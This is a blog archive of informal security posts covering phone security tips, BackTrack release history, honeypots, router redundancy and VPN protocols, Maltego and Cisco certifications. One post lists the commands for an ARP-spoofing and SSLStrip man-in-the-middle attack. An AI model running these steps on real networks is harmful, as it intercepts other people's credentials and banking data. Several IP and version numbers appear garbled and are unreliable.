Category Archives: security
I was thinking today about security. In the way to work I use to read a book who is talking about it. My mind is becoming paranoid. I was working before in a remote site too far away of the crowded city but now the situation is different. I am in a big city. When I´m going for work I see a lot of people with laptops, smartphones, tablets… and I only think in security.
Are all of those devices really secured? I´d like to think that at least, the professional people a device 100% secured. When I say secured… at least have an antivirus and password to unlock the device or password and some kind of encryption.
I believe that all other devices of teenagers and people who is not using the technology for work is not so protected. I saw some people unlocking the screen with a code number (that is good) and also with a figure code that is not so good(basically is because if you see the telephone against the light you would see the figure).
With a simple test, you could figure out how many devices are running with a open window when I say that I´m refering with bluetooth or wireless active. I know that for most of them, it is better having conections active because they can save 5 seconds in activate(aaahhhhh!!!).
I´m remembering my ages as administrator:
Me: – (looking out of the keyboard), please type your password.
User: – I wrote my user and pass for you in a peace of paper. I´m going to put some order here in the office.
Back to handy devices, there are many kind of attacks for smartphones that could be used with bad intentions. There are tons of stupid apps that people is downloading and they don´t update . This kind of apps are a good start to exploit.
Just some security advices:
- Put a password in your device(laptop, tablet, smartphone) to unlock. You could forget it in a public place and anyone could sniff in your personal data.
- Don´t save passwords. If someone get access to your device he could spend some time in ebay with your accout.
- If you have your passwords there, use a software to encrypt the password database.
- Don´t use weak passwords like…. “123456”
When you go to the bank machine, you use to hide the keyboard to avoid watchers. In same way, when you unlock your device, or you see an email try to do the same.
A good idea is using polarised covers.
One of the best pen-test, forensic and in general security tool is Back Track.
February 5, 2006 ——- BackTrack v.1.0 Beta
May 26, 2006 ———— The BackTrack project released its first non-beta version (1.0).
October 13, 2006 ——- BackTrack 2 first public beta released.
November 19, 2006 —- BackTrack 2 second public beta released.
March 6, 2007 ———— BackTrack 2 final released.
December 17, 2007 —- BackTrack 3 first beta release.
June 19, 2008 ———— BackTrack 3 final released.
February 11, 2009 —— BackTrack 4 first beta release. (It’s now based on Debian)
June 19, 2009 ———— BackTrack 4 pre-final release. 
January 9, 2010 ———- BackTrack 4 final release.
May 8, 2010 ————— BackTrack 4 R1 release
November 22, 2010 —- BackTrack 4 R2 release
My first contact with this tool was in 2007 just because I was testing(I love test new soft,hard…;) ) different security tools. I remember that first problem that I got was with the wifi card. My wireless chip was not supported in version 2. Thanks to the new version was almost ready… I could play with my laptop 😉 . It was useful in that moment.
What’s new in R2:
* Kernel 220.127.116.11 – *Much* improved mac80211 stack.
* USB 3.0 support.
* New wireless cards supported.
* All wireless Injection patches applied, maximum support for wireless attacks.
* Even *faster* desktop environment.
* Revamped Fluxbox environment for the KDE challenged.
* Metasploit rebuilt from scratch, MySQL db_drivers working out of the box.
* Updated old packages, added new ones, and removed obsolete ones.
* New BackTrack Wiki with better documentation and support.
New BackTrack 4 revision 1 is available to download.
New in this version:
* New Kernel 2.6.34 to improve hardware compatibility and performance.
* Update all tools
* New tool called “dragon” who can allow the user modify BackTrack options from CML
* Add the option to change KDE environment by Fluxbox offering a faster and flowed environment.
* Implementing driver rt28xx for Alpha AWUS050NH cards.
* If you download VMware version, VMware tools are integrated.
This is the final version of BackTrack 4 R1.
Please download it and test it!!!
Are you really sure that SSL connections are strong?. I mean, nobody can intercept your traffic, your passwords or even your bank account number. SSL is one of the world’s most important VPN encryption.
There is a tool (SSL strip) that the author claims to have used it to steal data from the most important and “safe” websites. This man is Moxie. A recognized security consultant.
1st – Configure IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
2nd – Perform a Main-in-the-middle ARP attack
arpspoof -i eth0 -t VICTIM
3rd – Redirect traffic through iptables
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080
4th – Start SSLStrip in used port
python sslstrip.py -w archivo
Moxie’s website: http://www.thoughtcrime.org
Honeypot is a software or computer that simulate a vulnerable system to attract attackers. This is a sweet for hackers or people who wants to play in the illegal side. This kind of “security systems”(from now SS) are used to know attack methods, possible systems failures or solutions to that failures. I mean SS because knowing different patterns, you can shield your infrastructure to prevent this type of attacks.
A honeypot is used to distract an attacker making a system more attractive. For example, is more appealing a computer called “server” than “computer”. Is more attractive a file called “passwords” than “images”. This are two examples of thousands.
A honeypot is then used to monitor the network. When an attacker is trying to crack your system, you have an opportunity to know more about the attacker.
For all of the above, a honeypot is a prevention and detection system.
Kind of honeypots:
Depending of function:
Production: Only capture information.
Research: Capture extensive information and used to research, military, or government organizations.
Depending of interaction with attacker:
Low interaction: Emulate services. Attacker think that is cracking a system but it is a software that is emulating this service.
High interaction: Attacker interact with it totally. All is real
At the beginning this honeypots were in most of the cases too expensive physical machines. At this time a honeypot can be a virtual machine in a virtual network with a virtual ip 🙂
I will test this kind of software to post comments in future.
I am a security passionate. First I would like to think about the concept.
What does it means “high availability”?
You are responsible of a small network and you have a spare server, router, switch and some computers. This can not be considered high availability because but is not efficient. High availability will be if you have two routers configured and in case that one is broken, all traffic will be router by the other one. The administrator should receive an alarm and this broken appliance should be replaced. This can be a “basic” scenario. It will be same for servers and switches.
Best scenario could be:
*Two different internet providers.
*A pair of good routers each one with redundant power and configured with HSRP, VRRP or GLBP protocols.
*A cluster server environment to prevent a failure in the system.
*All devices should be connected to a separate power line.
*A SAI should protect the core of the company.
If finally all the above can be duplicated in another office…. means that the information that you are handling is toooooo important 😉
I do not know if I have skipped an y concept.
This is the theory but it depends on the necessity of the company. If the company can assume an hour or a day loss service, then is not necessary all this kind of measures. However, if the company sells articles in a website each minute is important because the service is not good for the customer.
There are another extreme cases.I read a whitepapper in which the author were talking about the systems used by the military forces in aircrafts. The systems used to control this jets is best redundant example. It uses 3 different systems with 3 different architectures and 3 different operating systems. He did not talk about power but I think that is redundant too 😉
Now let’s start to talk about redundant protocols.
Hot Standby Router Protocol (HSRP). Provides default gateway redundancy using one active and one standby router. That means. A router is receiving all weight and in case of it fails, the standby router will become as active router. When the the service is established it will back to standby router as before. By multicasting packets, HSRP sends its hello messages to the multicast address 18.104.22.168 using UDP port 1985, to other HSRP-enabled routers, defining priority between the routers.The primary router with the highest configured priority will act as a virtual router with a pre-defined gateway IP and will respond to the ARP request from machines connected to the LAN with the mac address 0000.0c07.acXX where XX is the group ID in hex. If the primary router should fail, the router with the next-highest priority would take over the gateway IP and answer ARP requests with the same mac address, thus achieving transparent default gateway fail-over.
HSRP and VRRP are not routing protocols as they do not advertise IP routes or affect the routing table in any way.
HSRP and VRRP on some routers have the ability to trigger a failover if one or more interfaces on the router go down. This can be useful for dual branch routers each with a single serial link back to the head end. If the serial link of the primary router goes down, you would want the backup router to take over the primary functionality and thus retain connectivity to the head end.
Virtual Router Redundancy Protocol (VRRP). An open-standard alternative to Cisco’s HSRP, providing the same funcionality.designed to increase the availability of the default gateway servicing hosts on the same subnet. This increased reliability is achieved by advertising a “virtual router” (an abstract representation of master and backup routers acting as a group) as a default gateway to the host(s) instead of one physical router. Two or more physical routers are then configured to stand for the virtual router, with only one doing the actual routing at any given time. If the current physical router that is routing the data on behalf of the virtual router fails, an arrangement is made for another physical router to automatically replace it. The physical router that is currently forwarding data on behalf of the virtual router is called the master router. Physical routers standing by to take over from the master router in case something goes wrong are called backup routers.
A virtual router must use 00-00-5E-00-01-XX as its Media Access Control (MAC) address. The last byte of the address (XX) is the Virtual Router IDentifier (VRID), which is different for each virtual router in the network. This address is used by only one physical router at a time, and it will reply with this MAC address when an ARP request is sent for the virtual router’s IP address. Physical routers within the virtual router must communicate within themselves using packets with multicast IP address 22.214.171.124 and IP protocol number 112.
Routers have a priority of between 1-255 and the router with the highest priority will become the master. When a planned withdrawal of a master router is to take place, its priority can be lowered which means a backup router will pre-empt the master router status rather than having to wait for the hold time to expire. This reduces the black hole period.
Gateway Load Balancing Protocol (GLBP). Supports arbitrary load balancing in addition to redundancy across gateways. It is a Cisco proprietary protocol that attempts to overcome the limitations of existing redundant router protocols by adding basic load balancing functionality.
In addition to being able to set priorities on different gateway routers, GLBP also allows a weighting parameter to be set. Based on this weighting (compared to others in the same virtual router group), ARP requests will be answered with MAC addresses pointing to different routers. Thus, load balancing is not based on traffic load, but rather on the number of hosts that will use each gateway router. By default GLBP load balances in round-robin fashion.
GLBP elects one AVG (Active Virtual Gateway) for each group. Other group members act as backup in case of AVG failure. In case there are more than two members, second best AVG is placed in the Standby state and all other members are placed in the Listening state. This is monitored using hello and holdtime timers, which are 3 and 10 seconds by default. The elected AVG then assigns a virtual MAC address to each member of the GLBP group, including itself, thus enabling AVFs (Active Virtual Forwarders). Each AVF assumes responsibility for forwarding packets sent to its virtual MAC address. There could be up to four active AVFs at the same time.
By default, GLBP routers use the local multicast address 126.96.36.199 to send hello packets to their peers every 3 seconds over UDP 3222 (source and destination).
There are different protocols of VPN(Virtual Private Network). The most common are PPTP, L2TP, IPSec and TLS.
This protocol was developed by Microsoft in conjunction with other technology companies. Is the most supported by Microsoft clients. PPTP is an extension of PPP and for that reason uses same type of authentication(PAP, SPAP, CHAP,MS-CHAP, EAP). The big problem in this protocol is that can not provide encryption. Microsoft has resolved that issue using the protocol in conjnction with MPPE(Microsoft Point-toPoint Encryption) to provide a secure VPN.
In most Microsoft operating systems can be deployed without any kind of client software installation and is available for Linux and some Mac OS versions. PPTP is supported by Cisco PIX, SonicWall and most of firewall appliances.
Achronym means: Layer 2 Tunneling Protocol. This protocols was depveloped by Microsoft with Cisco collaboration, combining features of PPTP with those of Cisco’s propietary Layer 2 Forwarding (L2F) protocol. It can be used on non-IP networks such as ATM, frame relay and X.25. Is supported by major firewall products like ISA Server, CheckPoint, Cisco PIX for example.
IP Security(IPSec), and Encapsulag Security Payload (ESP) protocol, provides encyption for L2TP tunnels. It requires the use of digital certificates. User authentication is performed via the same PPP authentication mechanisms as PPTP, but L2TP also provides computer authentication.
L2TP provides data integrity(protection against modification of the data between the time it left the sender and the time it reached the recipient), authentication of origin(confirmation that the user who claims to have sent the data really did), and replay protection(keeps a hacker from being able to capture data that is send, sucha as the sending of credentials, and then “replay” it to “trick” the server). On the other hand, the overhead involved in providing this extra security can result in sightly slower performance than PPTP.
This protocol does not provide any encryption or confidentiality by itself.
As its name implies it is an IP security protocol. It encrypts and authenticates each packet. It operates at layer 3 (network) in OSI model.
This is one of the most preferred VPN protocols for site-to-site connections. Many hardware VPN appliances use an implementation of IPSec (Cisco VPN Concentrators and PIX, SonicWall, Watchguard…).
It requires that the VPN client computers have client software installed. Useful for users that are not in the office(remote users).If it is used in tunnel mode, it secures packets transmitted between two gateways. It is a normal practise in VPN’s between branch offices.
IPSec is implemented by a group of cryptographic protocols to ensure flow control, mutual authentication and stablish cryptographic parameters. The security IP arquitecture uses SA(Security Association) to set-up security functions like IKE and IKEv2(Internet Key Exchange) or KINK(Kerberized Internet Negotiation of Keys).
There are two different modes: Transport or Tunnel
Transport mode. Only payload(data sent) is encrypted or authenticated
Tunnel mode. Complete packet is enrypted or authenticated
Transport Layer Security. It is the succesor of SSL(Secure Socket Layer). It is a protocol in which you do not need additional software installed in your computer. It uses web browsers as client application.TLS provides endpoint authentication using cryptography. TLS authentication is unilateral that means: server is authenticated but not vice-versa.
When a TLS or SSL connection is established, the client and server negotiate a CipherSuite, exchanging CipherSuite codes in the client hello and server hello messages, which specifies a combination of cryptographic algorithms to be used for the connection. The key exchange and authentication algorithms are typically public key algorithms, or as in TLS-PSK preshared keys could be used. The message authentication codes are made up from cryptographic hash functions using the HMAC construction for TLS, and a non-standard pseudorandom function for SSL
I will explain IPSec and TLS protocols in separate posts.
As I said days ago, ” I will test Back Track 4″. So, I did it!
Let me tell you that I only have been testing Maltego tool. Oh my Goooooood!!!!! It´s amazing. This is a forensic and pen-test tool.If you want to check a domain, website or whatever in a network, this tool can help you. It is graphical and you can see the evolution easily.
For example: You want to know from outside, which information of your company people can get . This is an example:
As you can see, there are a lot of data that maybe you don´t want to be available from Internet. This is only the start 😦 because Maltego can get the following information:
* E-mail directions
* Ip addresses, even if you have more than one
* Net block
* Phone number (in case that is placed in website or another kind of document acceded from outside.
* MX record
* NX record
* Domain (you know an ip address and you want to know all domains behind this ip)
* People(social networks)
There is a lot of info… so, if you think that your network is safe and the people only can see your website… check this tool before 🙂
This is the user guide: http://ctas.paterva.com/view/Userguide
Once you have tested, you can get your own conclusions.
Recomended 100 %!!
I´m going to speak about my Certification path.
I´m currently CCSP (Cisco Certified Security Professional). To achieve this certification, I have been studying around a year. I was working in a small company configuring and installing some routers, switches and another kind of network devices. I started to study the basic Cisco certification that is CCNA(Cisco Certified Network Associate). After that, I thought: “which field you would like to study?” In that moment, I was starting to introduce myself in security. Then, I choose CCSP because the other path, CCNP(Cisco Certified Network Professional) is related with networks and It didn´t have interest for me.
Studying this certification, I have discovered my passion, SECURITY SYSTEMS. Before, let me explain you that “Security” cover lot of fields and if you really love it… you should choose your path. In my case Network Security Systems. That means, routers, switches, firewalls, ips, ids, sniffers, scanners…
Some people, get this certification and then think: “This is the end of my path, from now, I´m a security expert”. I´m so sorry, but it is not true. This is a part of your race. This, can be the start. In IT, you need to study every year if you want to be updated.
I´m currently studying CCNP(Cisco Certified Network Professional) and I think that in no more than 2 months I will get it! 😉
Cisco is not the only way but in my case was my start. In my opinion, if you want to be a Security Expert, you should try with:
* CISSP Certified Information Systems Security Professional
* CISA Certified Information Security Auditor
One of these is the best path because is not focused in a technology, like Cisco, Juniper or another vendor.
There are more certifications but not so technical.
Now is your decision!.